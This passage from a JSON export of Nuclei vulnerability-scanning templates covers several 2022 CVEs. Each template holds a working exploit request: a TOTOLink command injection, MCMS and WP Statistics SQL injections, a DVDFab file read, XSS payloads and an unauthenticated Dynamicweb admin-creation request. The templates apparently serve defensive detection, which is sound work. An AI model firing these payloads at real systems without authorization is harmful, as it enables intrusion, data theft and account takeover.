prior to version 4.2.30 are vulnerable to information disclosure.\n impact: |\n An attacker can exploit this vulnerability to gain sensitive information about the server, potentially leading to further attacks.\n remediation: |\n Upgrade the TerraMaster TOS server to version 4.2.30 or later to mitigate the vulnerability.\n reference:\n - https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/\n - https://www.broadcom.com/support/security-center/attacksignatures/detail?asid=33732\n - https://forum.terra-master.com/en/viewforum.php?f=28\n - http://packetstormsecurity.com/files/172904/TerraMaster-TOS-4.2.29-Remote-Code-Execution.html\n - https://github.com/ArrestX/--POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-24990\n cwe-id: CWE-306\n epss-score: 0.9593\n epss-percentile: 0.99416\n cpe: cpe:2.3:o:terra-master:terramaster_operating_system:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: terra-master\n product: terramaster_operating_system\n shodan-query: \"TerraMaster\"\n tags: cve,cve2022,packetstorm,terramaster,exposure,kev,terra-master\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/module/api.php?mobile/webNasIPS\"\n\n headers:\n User-Agent: \"TNAS\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/json\"\n - \"TerraMaster\"\n condition: and\n\n - type: regex\n part: body\n regex:\n - \"webNasIPS successful\"\n - \"(ADDR|(IFC|PWD|[DS]AT)):\"\n - \"\\\"((firmware|(version|ma(sk|c)|port|url|ip))|hostname)\\\":\"\n condition: or\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221009ccfe394bc6b8b31a756bb60d7542f8fa5d38bf65d3321043f1b75787cd1df0d022100e3ca4a315ae22f1611dd448073eb23a4fb2ad50d182e63e1037d0e816c1544a2:922c64590222798bb761d5b6d8e72950", "hash": "94ae8f914b394f4b46dd785b9309effc", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084cc" }, "name": "CVE-2022-25082.yaml", "content": "id: CVE-2022-25082\n\ninfo:\n name: TOTOLink - Unauthenticated Command Injection\n author: gy741\n severity: critical\n description: |\n TOTOLink A950RG V5.9c.4050_B20190424 and V4.1.2cu.5204_B20210112 were discovered to contain a command injection vulnerability in the Main function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network.\n remediation: |\n Apply the latest firmware update provided by the vendor to fix the command injection vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/cve-2022-25082\n - https://github.com/EPhaha/IOT_vuln/blob/main/TOTOLink/A950RG/README.md\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-25082\n cwe-id: CWE-78\n epss-score: 0.0417\n epss-percentile: 0.92009\n cpe: cpe:2.3:o:totolink:a950rg_firmware:4.1.2cu.5204_b20210112:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: totolink\n product: a950rg_firmware\n tags: cve,cve2022,totolink,router,unauth,rce,iot,intrusive\nvariables:\n cmd: \"`ls>../{{randstr}}`\"\n\nhttp:\n - raw:\n - |\n GET /cgi-bin/downloadFlile.cgi?payload={{cmd}} HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /{{randstr}} HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_2\n words:\n - .sh\n - .cgi\n condition: and\n\n - type: word\n part: header_2\n words:\n - application/octet-stream\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100ab2d16fe98044552f6b033c5d66ef9d749c2577f4ba89980e3804e6e0961c42002204911d612998bfb262eb6fdacd0a6fc2a9e74331eeba778603ed15a039ec9d16b:922c64590222798bb761d5b6d8e72950", "hash": "3fc65947abb638fd076245bcf9d652d5", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084cd" }, "name": "CVE-2022-25125.yaml", "content": "id: CVE-2022-25125\n\ninfo:\n name: MCMS 5.2.4 - SQL Injection\n author: Co5mos\n severity: critical\n description: |\n MCMS 5.2.4 contains a SQL injection vulnerability via search.do in the file /mdiy/dict/listExcludeApp. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in MCMS 5.2.4.\n reference:\n - https://github.com/ming-soft/MCMS/issues/90\n - https://gitee.com/mingSoft/MCMS/issues/I4TGYI\n - https://nvd.nist.gov/vuln/detail/CVE-2022-25125\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-25125\n cwe-id: CWE-89\n epss-score: 0.02031\n epss-percentile: 0.87716\n cpe: cpe:2.3:a:mingsoft:mcms:5.2.4:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: mingsoft\n product: mcms\n shodan-query: http.favicon.hash:1464851260\n fofa-query: icon_hash=\"1464851260\"\n tags: cve,cve2022,sqli,mcms,mingsoft\nvariables:\n num: \"999999999\"\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/mdiy/dict/listExcludeApp?query=1&dictType=1&orderBy=1/**/or/**/updatexml(1,concat(0x7e,md5('{{num}}'),0x7e),1)/**/or/**/1\"\n\n headers:\n Content-Type: application/x-www-form-urlencoded\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"c8c605999f3d8352d7bb792cf3fdb25\"\n\n - type: word\n part: header\n words:\n - \"application/json\"\n# digest: 4a0a0047304502210082b6a248202fef50a86c36616626d308355488ad6aa5d4ef24b183158f17b9b0022006b63a9e980e50f042f60dbe4457b4bd55a23a77f4cc51ce5d2057ae661a61b1:922c64590222798bb761d5b6d8e72950", "hash": "ccdd9fe1437b2dd020ba4ee7e1e29ef8", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084ce" }, "name": "CVE-2022-25148.yaml", "content": "id: CVE-2022-25148\n\ninfo:\n name: WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the current_page_id parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5.\n remediation: Update wp-statistics plugin to version 13.1.6, or newer.\n reference:\n - https://wordpress.org/plugins/wp-statistics/\n - https://gist.github.com/Xib3rR4dAr/5dbd58b7f57a5037fe461fba8e696042\n - https://nvd.nist.gov/vuln/detail/CVE-2022-25148\n - http://packetstormsecurity.com/files/174482/WordPress-WP-Statistics-13.1.5-SQL-Injection.html\n - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2679983%40wp-statistics&new=2679983%40wp-statistics&sfp_email=&sfph_mail=\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-25148\n cwe-id: CWE-89\n epss-score: 0.10089\n epss-percentile: 0.94364\n cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: veronalabs\n product: wp_statistics\n framework: wordpress\n google-query: inurl:/wp-content/plugins/wp-statistics\n tags: cve,cve2022,packetstorm,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n - |\n @timeout: 15s\n GET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce={{nonce}}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1×tamp=11¤t_page_type=home¤t_page_id=sleep(6)&search_query&page_uri=/&user_id=0 HTTP/1.1\n Host: {{Hostname}}\n\n host-redirects: true\n matchers:\n - type: dsl\n dsl:\n - duration>=6\n - status_code == 200\n - contains(header, \"application/json\")\n - contains(body, 'Visitor Hit was recorded successfully')\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - '_wpnonce=([0-9a-zA-Z]+)'\n internal: true\n# digest: 4a0a00473045022100ca848fcb45e23d7d210462b4aa7c89510aa622fe4bb4c0639f5035c1e09b2a5902205b9422a4700bd06f51bc7edd9a951403e9ad2145500336c3690f7beed9414f5a:922c64590222798bb761d5b6d8e72950", "hash": "d31e97aee5e757a44d0eac61dba5a16e", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084cf" }, "name": "CVE-2022-25149.yaml", "content": "id: CVE-2022-25149\n\ninfo:\n name: WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection\n author: theamanrawat\n severity: high\n description: |\n The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the IP parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5.\n reference:\n - https://wordpress.org/plugins/wp-statistics/\n - https://gist.github.com/Xib3rR4dAr/5dbd58b7f57a5037fe461fba8e696042\n - https://nvd.nist.gov/vuln/detail/CVE-2022-25149\n - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2679983%40wp-statistics&new=2679983%40wp-statistics&sfp_email=&sfph_mail=\n - https://www.wordfence.com/vulnerability-advisories/#CVE-2022-25149\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-25149\n cwe-id: CWE-89\n epss-score: 0.36793\n epss-percentile: 0.97067\n cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: veronalabs\n product: wp_statistics\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/wp-statistics/\"\n tags: cve2022,cve,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n - |\n @timeout: 50s\n GET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce={{nonce}}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip='-sleep(6)-'&exclusion_match=no&exclusion_reason&ua=Something&track_all=1×tamp=11¤t_page_type=home¤t_page_id=0&search_query&page_uri=/&user_id=0 HTTP/1.1\n Host: {{Hostname}}\n\n host-redirects: true\n matchers:\n - type: dsl\n dsl:\n - duration>=6\n - status_code == 200\n - contains(header, \"application/json\")\n - contains(body, 'Visitor Hit was recorded successfully')\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - '_wpnonce=([0-9a-zA-Z]+)'\n internal: true\n# digest: 4a0a00473045022100f3ab364d23921ccdb931455c9ebd80865bd26ddd8d85a85e5c2f6fc86842424e022068720cfe546b2bb14a734450dfc5bdad56751bcdaef77f99acb548fddcb1ac38:922c64590222798bb761d5b6d8e72950", "hash": "3cb4fd434939b9535d9a0a4e7f090463", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084d0" }, "name": "CVE-2022-25216.yaml", "content": "id: CVE-2022-25216\n\ninfo:\n name: DVDFab 12 Player/PlayerFab - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: DVDFab 12 Player/PlayerFab is susceptible to local file inclusion which allows a remote attacker to download any file on the Windows file system for which the user account running DVDFab 12 Player (recently renamed PlayerFab) has read-access.\n impact: |\n The vulnerability allows an attacker to include arbitrary local files, potentially leading to unauthorized access, information disclosure.\n remediation: |\n Apply the latest patch or update from the vendor to fix the vulnerability.\n reference:\n - https://www.tenable.com/security/research/tra-2022-07\n - https://nvd.nist.gov/vuln/detail/CVE-2022-25216\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-25216\n cwe-id: CWE-22\n epss-score: 0.01345\n epss-percentile: 0.85828\n cpe: cpe:2.3:a:dvdfab:12_player:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dvdfab\n product: 12_player\n tags: cve,cve2022,dvdFab,lfi,lfr,tenable,dvdfab\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/download/C%3a%2fwindows%2fsystem.ini\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"bit app support\"\n - \"fonts\"\n - \"extensions\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402203f6ae7c1e6a044dfb0d2128ba0584e801d970fb9556d08d9a0525a2a896768f502202d00ccb4c7597331865d1c3b386225396ccb8816353db36cda136dc03489c824:922c64590222798bb761d5b6d8e72950", "hash": "a386740debd13d999fafdbe53438000c", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084d1" }, "name": "CVE-2022-25323.yaml", "content": "id: CVE-2022-25323\n\ninfo:\n name: ZEROF Web Server 2.0 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: ZEROF Web Server 2.0 allows /admin.back cross-site scripting.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in ZEROF Web Server 2.0.\n reference:\n - https://github.com/awillix/research/blob/main/cve/CVE-2022-25323.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-25323\n - https://awillix.ru\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/awillix/research\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-25323\n cwe-id: CWE-79\n epss-score: 0.00115\n epss-percentile: 0.45093\n cpe: cpe:2.3:a:zerof:web_server:2.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zerof\n product: web_server\n tags: cve,cve2022,xss,zerof\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admin.back<img%20src=x%20onerror=alert(document.domain)>\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'back<img src=x onerror=alert(document.domain)>'\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 401\n# digest: 4a0a00473045022100e86147269d500eee87a76dc8b3d4d6b539f23c5c25293ad044322e223159453702203e3e862ec74768390d0b5445cfb478c43678e1e7109cd2e1d3f97e9bb17fdd90:922c64590222798bb761d5b6d8e72950", "hash": "e1e8d43edd26c3bdbbb3fd821e645e4f", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084d2" }, "name": "CVE-2022-2535.yaml", "content": "id: CVE-2022-2535\n\ninfo:\n name: SearchWP Live Ajax Search < 1.6.2 - Unauthenticated Arbitrary Post Title Disclosure\n author: r3Y3r53\n severity: medium\n description: |\n The plugin does not ensure that users making. alive search are limited to published posts only, allowing unauthenticated users to make a crafted query disclosing private/draft/pending post titles along with their permalink\n remediation: Fixed in version 1.6.2\n reference:\n - https://wpscan.com/vulnerability/0e13c375-044c-4c2e-ab8e-48cb89d90d02\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2535\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2022-2535\n cwe-id: CWE-639\n epss-score: 0.00198\n epss-percentile: 0.56687\n cpe: cpe:2.3:a:searchwp:searchwp_live_ajax_search:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: searchwp\n product: searchwp_live_ajax_search\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/searchwp-live-ajax-search/\"\n tags: cve,cve2022,wp,wp-plugin,wordpress,wpscan,searchwp-live-ajax-search,searchwp\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=draft\"\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body, \"searchwp-live-search-result\")'\n condition: and\n# digest: 4a0a0047304502205c29befeae02b026b93a42c98ea54d1b6f5efaa102360055dbea4e7481f39b2f022100ad34ac1dc40f5d04fff554cad7674c9ca60fdd3db66a66b792e9e79ff14bca98:922c64590222798bb761d5b6d8e72950", "hash": "2933a283d8e383942b28ce9c10766e40", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084d3" }, "name": "CVE-2022-25356.yaml", "content": "id: CVE-2022-25356\n\ninfo:\n name: Alt-n/MDaemon Security Gateway <=8.5.0 - XML Injection\n author: Akincibor\n severity: medium\n description: |\n Alt-n/MDaemon Security Gateway through 8.5.0 is susceptible to XML injection via SecurityGateway.dll?view=login. An attacker can inject an arbitrary XML argument by adding a new parameter in the HTTP request URL. As a result, the XML parser fails the validation process and discloses information such as protection used (2FA), admin email, and product registration keys.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious XML code, leading to various security risks such as information disclosure, privilege escalation.\n remediation: |\n Upgrade Alt-n/MDaemon Security Gateway to version 8.5.1 or later to mitigate this vulnerability.\n reference:\n - https://www.swascan.com/security-advisory-alt-n-security-gateway/\n - https://www.altn.com/Products/SecurityGateway-Email-Firewall/\n - https://www.swascan.com/security-blog/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-25356\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2022-25356\n cwe-id: CWE-91\n epss-score: 0.00425\n epss-percentile: 0.73853\n cpe: cpe:2.3:a:altn:securitygateway:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: altn\n product: securitygateway\n google-query: inurl:\"/SecurityGateway.dll\"\n tags: cve,cve2022,altn,gateway,xml,injection\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/SecurityGateway.dll?view=login&redirect=true&9OW4L7RSDY=1'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Exception: Error while [Loading XML\"\n - \"<RegKey>\"\n - \"<IsAdmin>\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502207eaf7f3b8339b01fbf9d09efa0a1c48df53a4c44ce469786dd22d682531bb04d022100b158dfc406ffdb342ad75451f95e9b78f8fa9072ec60c97cfcb702e67a2736f7:922c64590222798bb761d5b6d8e72950", "hash": "97316cc8dd1f5b5697d31db31ac15b79", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084d4" }, "name": "CVE-2022-25369.yaml", "content": "id: CVE-2022-25369\n\ninfo:\n name: Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin User Creation\n author: pdteam\n severity: critical\n description: Dynamicweb contains a vulnerability which allows an unauthenticated attacker to create a new administrative user.\n remediation: 'Upgrade to one of the fixed versions or higher: Dynamicweb 9.5.9, 9.6.16, 9.7.8, 9.8.11, 9.9, 9.10.18, 9.12.8, or 9.13.0.'\n reference:\n - https://blog.assetnote.io/2022/02/20/logicflaw-dynamicweb-rce/\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25369\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-25369\n cwe-id: CWE-425\n metadata:\n max-request: 1\n shodan-query: http.component:\"Dynamicweb\"\n tags: cve2022,cve,dynamicweb,rce,unauth\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername={{rand_base(6)}}&adminpassword={{rand_base(6)}}&adminemail=test@test.com&adminname=test\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"Success\": true'\n - '\"Success\":true'\n condition: or\n\n - type: word\n part: header\n words:\n - 'application/json'\n - 'ASP.NET_SessionId'\n condition: and\n case-insensitive: true\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100b7f35452dbfcd48834f3400c73dcf201cc3872265ccf60c523480c1d6cee56fd02202c82c05a62a41f20bff8ca897e0fbf249b14b87a0da1aa8d03aebb40c626803d:922c64590222798bb761d5b6d8e72950", "hash": "520854514d9509f3a766c09917e206ca", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084d5" }, "name": "CVE-2022-2544.yaml", "content": "id: CVE-2022-2544\n\ninfo:\n name: WordPress Ninja Job Board < 1.3.3 - Direct Request\n author: tess\n severity: high\n description: WordPress Ninja Job Board plugin prior to 1.3.3 is susceptible to a direct request vulnerability. The plugin does not protect the directory where it stores uploaded resumes, making it vulnerable to unauthenticated directory listing which allows the download of uploaded resumes.\n impact: |\n An attacker can access sensitive files and potentially obtain sensitive information from the target system.\n remediation: |\n Update to the latest version of the WordPress Ninja Job Board plugin (1.3.3) to fix the vulnerability.\n reference:\n - https://plugins.trac.wordpress.org/changeset/2758420/ninja-job-board/trunk/includes/Classes/File/FileHandler.php?old=2126467&old_path=ninja-job-board%2Ftrunk%2Fincludes%2FClasses%2FFile%2FFileHandler.php\n - https://wpscan.com/vulnerability/a9bcc68c-eeda-4647-8463-e7e136733053\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2544\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2544\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-2544\n cwe-id: CWE-425\n epss-score: 0.00551\n epss-percentile: 0.7513\n cpe: cpe:2.3:a:wpmanageninja:ninja_job_board:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: wpmanageninja\n product: ninja_job_board\n framework: wordpress\n tags: cve2022,cve,ninja,exposure,wpscan,wordpress,wp-plugin,wp,wpmanageninja\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp/wp-content/uploads/wpjobboard/\"\n - \"{{BaseURL}}/wp-content/uploads/wpjobboard/\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Index of /wp/wp-content/uploads/wpjobboard\"\n - \"Index of /wp-content/uploads/wpjobboard\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100c3064d8709e47d8bc7b434502a27234fba508fca7c1339c6d99d091e98228c08022100d2289a0c1c442dc09404549115ed1975e200909c8473604550aa76083464a23d:922c64590222798bb761d5b6d8e72950", "hash": "aeb8aa4a4eb20fb7a3e1c9af49268a5c", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084d6" }, "name": "CVE-2022-2546.yaml", "content": "id: CVE-2022-2546\n\ninfo:\n name: WordPress All-in-One WP Migration <=7.62 - Cross-Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n WordPress All-in-One WP Migration plugin 7.62 and prior contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the target website, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of the WordPress All-in-One WP Migration plugin (7.63 or higher) to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/f84920e4-a1fe-47cf-9ba5-731989c70f58\n - https://wordpress.org/plugins/all-in-one-wp-migration/\n - https://patchstack.com/database/vulnerability/all-in-one-wp-migration/wordpress-all-in-one-wp-migration-plugin-7-62-unauthenticated-reflected-cross-site-scripting-xss-vulnerability\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2546\n - https://github.com/0xvinix/CVE-2022-2546\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 4.7\n cve-id: CVE-2022-2546\n cwe-id: CWE-79\n epss-score: 0.00252\n epss-percentile: 0.64447\n cpe: cpe:2.3:a:servmask:all-in-one_wp_migration:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: servmask\n product: all-in-one_wp_migration\n framework: wordpress\n tags: cve,cve2022,all-in-one-wp-migration,authenticated,wpscan,wordpress,wp-plugin,wp,xss,servmask\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=ai1wm_export HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1&options%5Breplace%5D%5Bnew_value%5D%5B%5D=XSSPAYLOAD%3Csvg+onload=alert(document.domain)%3E&ai1wm_manual_export=1&secret_key={{secretkey}} HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - contains(header_3, \"text/html\")\n - status_code_3 == 200\n - contains(body_3, '{\\\"new_value\\\":[\\\"XSSPAYLOAD<svg onload=alert(document.domain)>')\n condition: and\n\n extractors:\n - type: regex\n name: secretkey\n group: 1\n regex:\n - 'ai1wm_feedback\"},\"secret_key\":\"([0-9a-zA-Z]+)\"'\n internal: true\n# digest: 4b0a00483046022100b7d06ce856a168a95b454d4325f60f812325ac99d80ba9a9b145c641a5457c16022100c7ea3daf3be143b3953ed74dea7edd703e5b7825a231fba31a84de3c93d919c6:922c64590222798bb761d5b6d8e72950", "hash": "e8ac9b345df361779d95928b48b8ec00", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084d7" }, "name": "CVE-2022-25481.yaml", "content": "id: CVE-2022-25481\n\ninfo:\n name: ThinkPHP 5.0.24 - Information Disclosure\n author: caon\n severity: high\n description: |\n ThinkPHP 5.0.24 is susceptible to information disclosure. This version was configured without the PATHINFO parameter. This can allow an attacker to access all system environment parameters from index.php, thereby possibly obtaining sensitive information, modifying data, and/or executing unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to gain sensitive information.\n remediation: |\n Upgrade to a patched version of ThinkPHP or apply the necessary security patches.\n reference:\n - https://github.com/Lyther/VulnDiscover/blob/master/Web/ThinkPHP_InfoLeak.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-25481\n - https://github.com/20142995/sectool\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-25481\n cwe-id: CWE-668\n epss-score: 0.01261\n epss-percentile: 0.85321\n cpe: cpe:2.3:a:thinkphp:thinkphp:5.0.24:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: thinkphp\n product: thinkphp\n shodan-query: title:\"ThinkPHP\"\n tags: cve,cve2022,thinkphp,exposure,oss\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/index.php?s=example'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Exception\"\n - \"REQUEST_TIME\"\n - \"ThinkPHP Constants\"\n condition: and\n\n - type: status\n status:\n - 200\n - 500\n - 404\n condition: or\n# digest: 4a0a004730450220152a665e7b3a3c19077e3bf8a9d5f588afd66692737ed127dea8c823f9a1dd04022100d65ce7ec17220bbd6cfd2f3278886cd52b2f34beaae8509405bcfd1affd9940f:922c64590222798bb761d5b6d8e72950", "hash": "6d9918d27a51805fea78945d12dc3ca2", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084d8" }, "name": "CVE-2022-25485.yaml", "content": "id: CVE-2022-25485\n\ninfo:\n name: Cuppa CMS v1.0 - Local File Inclusion\n author: theamanrawat\n severity: high\n description: |\n CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertLightbox.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.\n remediation: |\n Upgrade to the latest version of Cuppa CMS or apply the vendor-provided patch to fix the LFI vulnerability.\n reference:\n - https://github.com/CuppaCMS/CuppaCMS\n - https://nvd.nist.gov/vuln/detail/CVE-2022-25485\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: 